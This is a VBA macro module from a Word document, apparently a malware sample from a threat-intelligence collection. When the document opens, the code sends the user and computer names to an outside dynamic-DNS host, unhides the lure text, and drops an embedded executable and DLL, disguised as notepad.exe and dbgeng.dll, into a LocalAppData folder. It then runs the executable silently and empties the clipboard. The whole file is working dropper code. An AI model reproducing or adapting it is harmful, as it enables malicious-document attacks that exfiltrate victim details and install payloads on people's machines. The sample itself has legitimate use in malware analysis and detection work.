Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
    Private Declare PtrSafe Function OpenClipboard Lib "user32" (ByVal hwnd As Long) As Long
    Private Declare PtrSafe Function EmptyClipboard Lib "user32" () As Long
    Private Declare PtrSafe Function CloseClipboard Lib "user32" () As Long
    Private Declare PtrSafe Function ShellExecuteA Lib "Shell32" (ByVal hLibModule As Long, ByVal lpOperation As String, ByVal lpLibFileName As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Integer) As Long
#Else
    Private Declare Function ShellExecuteA Lib "Shell32" Alias "ShellExecuteA" (ByVal hLibModule As Long, ByVal lpOperation As String, ByVal lpLibFileName As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Integer) As Long
    Private Declare Function OpenClipboard Lib "user32" (ByVal hwnd As Long) As Long
    Private Declare Function EmptyClipboard Lib "user32" () As Long
    Private Declare Function CloseClipboard Lib "user32" () As Long
#End If

Private Sub Document_Open()
    On Error Resume Next
    Dim iShape As InlineShape
    Dim EmbeddedEXEFileName As String
    Dim EmbeddedDllFileName As String
    Dim OutPutEXEName As String
    Dim OutPutDllName As String
    Dim DLLReleased As Boolean
    Dim EXEReleased As Boolean
    Dim sHostName As String
    Dim sUserName As String
    Dim myurl As String
    Dim MyRequest As Object
    Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
    sHostName = Environ$("computername")
    sUserName = Environ$("username")
    myurl = "http://dynamics.ddnsking.com/index.html?u=" + sUserName + "&h=" + sHostName
    MyRequest.Open "GET", _
    myurl
    MyRequest.Send
    ActiveDocument.Content.Font.Hidden = False
    EmbeddedEXEFileName = "zEfUJR9IwZL7zLbBvu7EbxVnT670gw"
    EmbeddedDllFileName = "iEUSqA3yTPYANV482fOeDu9CPqLtAV"
    OutPutEXEName = Environ("localappdata") + "\Microsoft" + "\Windows" + "\Burn" + "\notepad.exe"
    OutPutDllName = Environ("localappdata") + "\Microsoft" + "\Windows" + "\Burn" + "\dbgeng.dll"
    DLLReleased = False
    EXEReleased = False
    For Each iShape In ActiveDocument.InlineShapes
        If iShape.AlternativeText = EmbeddedEXEFileName Then
            iShape.Select
            Selection.Copy
            FileCopy Environ("TMP") & "\" & EmbeddedEXEFileName, OutPutEXEName
            EXEReleased = True
        ElseIf iShape.AlternativeText = EmbeddedDllFileName Then
            iShape.Select
            Selection.Copy
            FileCopy Environ("TMP") & "\" & EmbeddedDllFileName, OutPutDllName
            DLLReleased = True
        End If
    Next iShape
    If DLLReleased = True And EXEReleased = True Then
        ShellExecuteA 0, "open", OutPutEXEName, 0, 0, 0
    End If
    OpenClipboard (0&)
    EmptyClipboard
    CloseClipboard
End Sub



INQUEST-PP=macro
